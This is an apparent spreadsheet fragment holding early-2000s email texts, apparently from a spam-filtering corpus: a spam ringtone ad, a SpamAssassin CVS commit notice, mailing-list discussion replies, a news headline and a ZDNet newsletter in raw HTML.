         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;table width="350" border="0" cellspacing="1" cellpadding="0"&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width="141"&gt;&amp;nbsp;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgcolor="#FF0000"&gt; 
                 &lt;td width="206"&gt;&lt;b&gt;&lt;font size="2" color="#FFFFFF" face="Arial, Helvetica, sans-serif"&gt;SONG&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;b&gt;&lt;font size="2" color="#FFFFFF" face="Arial, Helvetica, sans-serif"&gt;ARTIST&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Get 
                   Ur Freak On&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Missy 
                   Elliott&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Billie 
                   Jean&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Michael 
                   Jackson&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Batman&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Danny 
                   Elfman&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Walk 
                   Like an Egyptian&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Bangles&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Flinstones&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Barbera&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;4 
                   Page Letter&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Aaliyah&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Like 
                   a Virgin&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Madonna&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;What's 
                   It Gonna Be?&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;B.Rhymes/J.Jackson&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Achy 
                   Breaky Heart&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Billy 
                   Ray Cyrus&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Star 
                   Spangled Banner&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;John 
                   Smith&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FF0000" height="2"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font size="2" color="#000000" face="Arial, Helvetica, sans-serif"&gt;When 
               you are ready to order, just&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFF00"&gt; 
             &lt;div align="center"&gt;&lt;font size="2" color="#FF0000" face="Arial, Helvetica, sans-serif"&gt; 
               &lt;a href=http://217.106.55.106/index.html&gt;&lt;b&gt;&lt;font size="5"&gt;&amp;#149;&amp;#149;&amp;#149;&amp;#149;&amp;#149;click here!&lt;/font&gt;&lt;font size="5"&gt;&amp;#149;&amp;#149;&amp;#149;&amp;#149;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;and 
               we will deliver your new tunes or graphics &lt;br&gt;
               via satellite in under 5 minutes.&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
               &lt;font face=verdana size=+2&gt;&lt;center&gt;&lt;b&gt; Take yourself out of our list &lt;a href=http://freesite010.merchantnet.biz/remove.html&gt;&lt;font color=green&gt;BY CLICKING HERE&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/center&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 &lt;/html&gt;
 24128644332
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin/t SATest.pm,1.15.4.1,1.15.4.2
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/t
 In directory usw-pr-cvs1:/tmp/cvs-serv3992/t
 Modified Files:
       Tag: b2_4_0
 	SATest.pm 
 Log Message:
 ok, looks like SA can now be run even with another version installed in /usr, again
 Index: SATest.pm
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/t/SATest.pm,v
 retrieving revision 1.15.4.1
 retrieving revision 1.15.4.2
 diff -b -w -u -d -r1.15.4.1 -r1.15.4.2
 --- SATest.pm	27 Aug 2002 21:44:14 -0000	1.15.4.1
 +++ SATest.pm	28 Aug 2002 22:46:28 -0000	1.15.4.2
 @@ -15,7 +15,7 @@
    my $tname = shift;
    $scr = $ENV{'SCRIPT'};
 -  $scr ||= "../spamassassin";
 +  $scr ||= "perl -w ../spamassassin";
    $spamd = $ENV{'SPAMD_SCRIPT'};
    $spamd ||= "../spamd/spamd -x";
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; From: Owen Byrne &lt;owen@permafrost.net&gt;
 &gt; A flippant remark that I will probably regret  -
 &gt; sure there's assholes everywhere. I just remember a lunch in Spain with
 &gt; a semi-famous American - I think we had about 10 nationalities at the
 &gt; table, and he managed to insult each of them within
 &gt; 15 minutes. A historical perspective makes me think that empires -
 &gt; Roman, British, Russian, American, whatever - produce
 &gt;  a larger proportion of assholes than subject nations (and are more
 &gt; likely to have them in positions of authority).
 Yep, those that win battles collect tthe spoils.  Lead and breed.  Want it to be
 different?  Lead, don't whine.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-09-17 at 11:16, Gary Lawrence Murphy wrote:
 &gt; &gt;&gt;&gt;&gt;&gt; "J" == Justin Mason &lt;jm@jmason.org&gt; writes:
 &gt; 
 &gt;     J&gt; What about Tibetan Buddhism BTW?  They seem like an awfully
 &gt;     J&gt; nice bunch of chaps (and chapesses).
 &gt; 
 &gt; Yes, them too.  When wolves attack their sheep, they coral the wolf
 &gt; into a quarry and then throw rocks from the surrounding cliffs so
 &gt; that "no one will know who killed the wolf"
 &gt; 
 &gt; In Samskar, before the Chinese arrived, there had not been a killing
 &gt; in over 2000 years, and the last recorded skirmish, over rights to
 &gt; a water hole, had happened several generations ago.
 I'm skeptical.  
 One of the many perversions of modern civilization is the fictitious
 rendering of various peoples, frequently to the point where the fiction
 is more "real" than the reality.  You see it over and over again in
 history:  The Primitive People pull a fast one on Whitey The Junior
 Anthropologist, playing to all the prejudices of Whitey (who only became
 Junior Anthropologists to support personal ideologies), and before you
 know it the charade takes on a life of its own which the Primitive
 People are compelled to perpetuate.  Worse, even when there is
 substantial evidence to the contrary with some basic scholarship, the
 facts have a hard time competing with the ideologically pleasing fiction
 that is already firmly entrenched.  And many peoples (e.g. American
 Indians) develop a profit motive for maintaining and promoting the myth
 in popular culture.
 I'm far more inclined to believe that people is people, no matter where
 you are on the planet.  The only time you see any anomalies is when you
 have a self-selecting sub-population within an otherwise normal
 population, which is hardly a fair way to look at any major population.
 -James Rogers
  jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Saddam set to let inspectors in
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8417796,215/
 Date: 2002-10-01T03:33:02+01:00
 Iraq muddles US resolve with 'positive' talks in Vienna.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</si>
  <si>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href="http://clickthru.online.com/Click?q=30-u8NEIRrPLM7Jz7p8IeOdSKzjX1iR"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href="http://clickthru.online.com/Click?q=45-fNkJIKBija2HZ6g-EDvznhjonlZR"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22, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;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&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;David Berlind&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;&lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0zdDyrJbh24YOLpk6Td6dR" &gt;
 &lt;b&gt;Why HP could be king of servers &lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Not only does HP have the inside track on Intel's &lt;B&gt;IA-64&lt;/B&gt;, but the company also has a companion chipset called &lt;B&gt;ZX1&lt;/B&gt;. HP is well-armed to battle IBM and Dell for server dominance.&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOL3YNz7PcU3RXvLF34ULXuR" &gt;
 &lt;b&gt;Here's the source of HP's EPIC power&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=85-2G2oQ7KrekErVyCaf70SVbToBBPR" &gt;Federal bill targets e- waste&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMpSJTmsV-Figi7yr9FKgnR" &gt;Wi-Fi group clears up naming confusion&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=af--dB8QLp7DA9Vh1-ydDX7NdmUVSeR" &gt;Movement grows to boost Wi-Fi hot spots&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WstkcJNEekHF6q-jPexAyR" &gt;Network defenders crack challenge&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPspkOP76uie23s1N87hJlR" &gt;Could WorldCom woes spark a price war?&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDDx4frjdD0QzbMuLbLad4R" &gt;Web services breeds teamwork&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rIIpKPmM4hKQcaLlAI6OrR" &gt;Gateway fights back with PC rebates&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rcgP7LzmRKMZ2Fz8IR7XlR"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src="http://image.com.com/techupdate/i/dfarber.jpg"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size="+1"&gt;&lt;b&gt;Bracing for an Internet meltdown&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Companies around the world are developing co-location facilities, interviewing backup vendors and bolstering wireless capabilities in anticipation of potential &lt;b&gt;communication service problems&lt;/b&gt;. The disgracing of vaunted names in the telecom-munications sector -- &lt;b&gt;Worldcom&lt;/b&gt;, &lt;b&gt;KPNQwest&lt;/b&gt;, &lt;b&gt;Global Crossing&lt;/b&gt; -- and talk of a broader meltdown is prompting a sense of &lt;b&gt;imminent disaster&lt;/b&gt; at companies that rely on Internet, phone or wireless connections for revenue and employee productivity. How worried are you?&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiKj5wj8LpaktQ3DlPfP8N4R" &gt;&lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJ3L1Sf1lL9Z5VKc-3P0BcR" &gt;&lt;b&gt;KPNQwest employees walk out&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 2--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="220" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/071902_tony_scott_quote.gif" width="220" height="184" border="0" align="right"&gt;
 &lt;/td&gt;
 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;What's your biggest tech nightmare?&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 It's a question that CNet News.com posed to the &lt;B&gt;top IT officers&lt;/B&gt; at some of America's largest &lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJxsQlD5tDYjKHbtbXYzHRR" &gt;Fortune 100 companies&lt;/A&gt;. Many of the technology leaders--from IBM, Citigroup, General Motors and Ford Motor--cited &lt;B&gt;security&lt;/B&gt; as the mother of all IT nightmares. Among the other complaints: cost overuns, unreliable technology, unstable vendors and disaster recovery . In contrast, &lt;B&gt;Fannie Mae CTO Julie St. John&lt;/B&gt; said nothing keeps her up at night "because I plan so far ahead on the infrastructure and the things that can bite us." What about you?&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEzJtS__AE7Bc1bJBykEmZR" &gt;
 &lt;b&gt;Take our QuickPoll&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- STORY 3 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Conditions for Itanium 2 adoption&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;B&gt;Gartner&lt;/B&gt; thinks enterprises should evaluate their Itanium 2 strategy based on three key elements: &lt;b&gt;Hardware&lt;/b&gt;, &lt;b&gt;OS&lt;/b&gt; and &lt;b&gt;applications&lt;/b&gt;. Wait until all three elements align before considering production deployment of Itanium 2 solutions.&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK2GayUWT46gJLkjCXMZHnR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 4 --&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="left"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/wayne_rash85x110.jpg" width="85" height="110" border="0" align="left"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;P&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Senate stops P2P, so should you&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The U.S. Senate sets a good, albeit belated, example by shutting off peer-to-peer networking. Tech Update's &lt;b&gt;Wayne Rash&lt;/b&gt; says you'd be foolish not to follow suit. Removing P2P networking from your company's computers is a quick way to lower the &lt;b&gt;risk of damage&lt;/b&gt; from worms and viruses--and to limit the damage a hacker can do.&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M2Z4_j0RT3V0z6qjySJGeR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Bill Gates, e-mail newsletter editor&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In the future, everyone will have their own e-mail newsletter. If &lt;b&gt;Berlind&lt;/b&gt; and &lt;b&gt;Farber&lt;/b&gt; have one, why not &lt;b&gt;Gates&lt;/b&gt; and &lt;b&gt;Ballmer&lt;/b&gt;? According to Microsoft, the two execs will issue newsletters on the company's views about the role of technology and public policy. The first volume, about Microsoft's &lt;b&gt;Trustworthy Computing&lt;/b&gt; initiative, went out Wednesday and was reputedly penned by Gates.&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEpaOcLcNiQhaIHsSzky0PR" &gt;
 &lt;b&gt;See what Bill has to say&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- Write to me --&gt;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href="http://clickthru.online.com/Click?q=c2-oXxLQUEDqh6KeyygVnxXFZcIuInR"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href="http://clickthru.online.com/Click?q=d7-wk3ZQLWDyhLPyvsRmBekeVktk2eR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;FEATURE&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy13g6THPL1kOqFb2GVaGyR" &gt;
 &lt;b&gt;Microsoft enhances directory technology&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;b&gt;Update:&lt;/b&gt; Microsoft is expanding the capability of its directory technology to allow customers to more easily add new applications to their network.&lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;REVIEW&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jxO5fGQPhvurMPGPxZ6RlR" &gt;
 &lt;b&gt;Outlook alternatives&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Need a sturdy organizer/scheduler that won't beggar you? An &lt;b&gt;alternative PIM&lt;/b&gt; might do the trick.&lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download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href="http://clickthru.online.com/Click?q=16-T_cjI4cTyOcubWzDblRuaBDxRU4R" &gt;
 &lt;b&gt;NT4 users: Act now or...&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Whether or not you like &lt;b&gt;Microsoft's new licensing plan&lt;/b&gt;, if you're still running NT4, &lt;b&gt;Larry Seltzer&lt;/b&gt; says you've got decisions to make, and soon.&lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;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href="http://clickthru.online.com/Click?q=2c-DatOIc0kqUDT_bqc-r7MBvWpjuyR" &gt;
 &lt;b&gt;Hey, thief! This laptop is locked&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Try stealing my notebook and &lt;b&gt;Caveo Anti-Theft&lt;/b&gt; will yell at you louder and louder -- before resorting to an unstoppable, ear-piercing screech.&lt;br&gt;&lt;br&gt;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size="-2"&gt;&lt;b&gt;MONITORS&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKzoDjYPmWU5CfCkxHB0FFR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/040802_monitors.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=56-NwKYInnwtJhTUuorctPQDwwaMC9R" style="text-decoration:none"&gt;&lt;b&gt;A Porsche you can afford&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
 Samsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P, a sleek, 17-inch LCD.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEXsAslw5D80ywQ-4d0P6cR" style="text-decoration:none"&gt;Read review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Monitors&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0J6e1530OoaDkjVsTLZ8iR" style="text-decoration:none"&gt;Samsung SyncMaster 151S&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdKme0F5P2r1yZeU_u_KnPR" style="text-decoration:none"&gt;NEC MultiSync 1550V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUQ1tMu2muWLXZBXqONOVnR" style="text-decoration:none"&gt;Envision EN-5100e&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZQw9mZ4Dr5w8PF_jEuwteR" style="text-decoration:none"&gt;Samsung SyncMaster 570 V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0EHePb-J6V_4Mc3148lk6yR" style="text-decoration:none"&gt;Samsung SyncMaster 955 DF&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVIgR2dE1fTRnU3P83P5XlR" style="text-decoration:none"&gt;More popular monitors&lt;/a&gt;&lt;/b&gt;&lt;br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href="http://clickthru.online.com/Click?q=ff-sVoVQmsafyrkiClZxrhBm0WHtheR" &gt;Acer brings P4 power to the people - read the review at ZDNet. &lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-I4Nk-VZs8ZvQIzTKtR1yR" &gt;Download Builder.com's 'Remedial XML' series.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjM3x2LMfqsNyGEI9rCM8vlR" &gt;Need a memory upgrade? Find out with CNET"s Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizcfEC5Hq3_7DQESNPe-i4R" &gt;Tech Update: Put a lid on CRM costs with self-service.  &lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=53-n86dINniB4HdXxZjHpx8lOheMncR" &gt;Check out thousands of IT job listings in ZDNet"s Career Center.&lt;/A&gt;
 &lt;/b&gt;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href='http://clickthru.online.com/Click?q=68-iMJqz9Pku19uzpYosgKgJxiJPlTK5RRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet'&gt;Manage
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLWMoHw-OPUywq2NRJSBTZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
